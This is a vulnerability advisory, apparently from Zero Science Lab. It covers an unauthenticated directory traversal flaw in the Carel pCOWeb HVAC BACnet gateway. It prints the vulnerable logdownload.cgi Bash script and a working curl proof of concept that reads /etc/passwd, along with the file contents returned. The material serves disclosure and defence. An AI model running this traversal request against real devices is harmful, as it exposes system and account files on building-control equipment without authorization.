Carel pCOWeb HVAC BACnet Gateway 2.1.0 Unauthenticated Directory Traversal

`  
Carel pCOWeb HVAC BACnet Gateway 2.1.0 Unauthenticated Directory Traversal  
  
  
Vendor: CAREL INDUSTRIES S.p.A.  
Product web page: https://www.carel.com  
Affected version: Firmware: A2.1.0 - B2.1.0  
Application Software: 2.15.4A  
Software version: v16 13020200  
  
Summary: pCO sistema is the solution CAREL offers its customers for managing HVAC/R  
applications and systems. It consists of programmable controllers, user interfaces,  
gateways and communication interfaces, remote management systems to offer the OEMs  
working in HVAC/R a control system that is powerful yet flexible, can be easily interfaced  
to the more widely-used Building Management Systems, and can also be integrated into  
proprietary supervisory systems.  
  
Desc: The device suffers from an unauthenticated arbitrary file disclosure vulnerability.  
Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script  
is not properly verified before being used to download log files. This can be exploited  
to disclose the contents of arbitrary and sensitive files via directory traversal attacks.  
  
=======================================================================================  
/usr/local/www/usr-cgi/logdownload.cgi:  
---------------------------------------  
  
01: #!/bin/bash  
02:  
03: if [ "$REQUEST_METHOD" = "POST" ]; then  
04: read QUERY_STRING  
05: REQUEST_METHOD=GET  
06: export REQUEST_METHOD  
07: export QUERY_STRING  
08: fi  
09:  
10: LOGDIR="/usr/local/root/flash/http/log"  
11:  
12: tmp=${QUERY_STRING%"$"*}  
13: cmd=${tmp%"="*}  
14: if [ "$cmd" = "dir" ]; then  
15: PATHCURRENT=$LOGDIR/${tmp#*"="}  
16: else  
17: PATHCURRENT=$LOGDIR  
18: fi  
19:  
20: tmp=${QUERY_STRING#*"$"}  
21: cmd=${tmp%"="*}  
22: if [ "$cmd" = "file" ]; then  
23: FILECURRENT=${tmp#*"="}  
24: else  
25: if [ -f $PATHCURRENT/lastlog.csv.gz ]; then  
26: FILECURRENT=lastlog.csv.gz  
27: else  
28: FILECURRENT=lastlog.csv  
29: fi  
30: fi  
31:  
32: if [ ! -f $PATHCURRENT/$FILECURRENT ]; then  
33: echo -ne "Content-type: text/html\r\nCache-Control: no-cache\r\nExpires: -1\r\n\r\n"  
34: cat carel.inc.html  
35: echo "<center>File not available!</center>"  
36: cat carel.bottom.html  
37: exit  
38: fi  
39:  
40: if [ -z $(echo $FILECURRENT | grep -i gz ) ]; then  
41: if [ -z $(echo $FILECURRENT | grep -i bmp ) ]; then  
42: if [ -z $(echo $FILECURRENT | grep -i svg ) ]; then  
43: echo -ne "Content-Type: text/csv\r\n"  
44: else  
45: echo -ne "Content-Type: image/svg+xml\r\n"  
46: fi  
47: else  
48: echo -ne "Content-Type: image/bmp\r\n"  
49: fi  
50: else  
51: echo -ne "Content-Type: application/x-gzip\r\n"  
52: fi  
53: echo -ne "Content-Disposition: attachment; filename=$FILECURRENT\r\n\r\n"  
54:  
55: cat $PATHCURRENT/$FILECURRENT  
  
=======================================================================================  
  
Tested on: GNU/Linux 4.11.12 (armv7l)  
thttpd/2.29  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2022-5709  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5709.php  
  
  
10.05.2022  
  
--  
  
  
$ curl -s http://10.0.0.3/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd  
  
root:x:0:0:root:/root:/bin/sh  
daemon:x:1:1:daemon:/usr/sbin:/bin/false  
bin:x:2:2:bin:/bin:/bin/false  
sys:x:3:3:sys:/dev:/bin/false  
sync:x:4:100:sync:/bin:/bin/sync  
mail:x:8:8:mail:/var/spool/mail:/bin/false  
www-data:x:33:33:www-data:/var/www:/bin/false  
operator:x:37:37:Operator:/var:/bin/false  
nobody:x:65534:65534:nobody:/home:/bin/false  
guest:x:502:101::/home/guest:/bin/bash  
carel:x:500:500:Carel:/home/carel:/bin/bash  
http:x:48:48:HTTP users:/usr/local/www/http:/bin/false  
httpadmin:x:200:200:httpadmin:/usr/local/www/http:/bin/bash  
sshd:x:1000:1001:SSH drop priv user:/:/bin/false  
`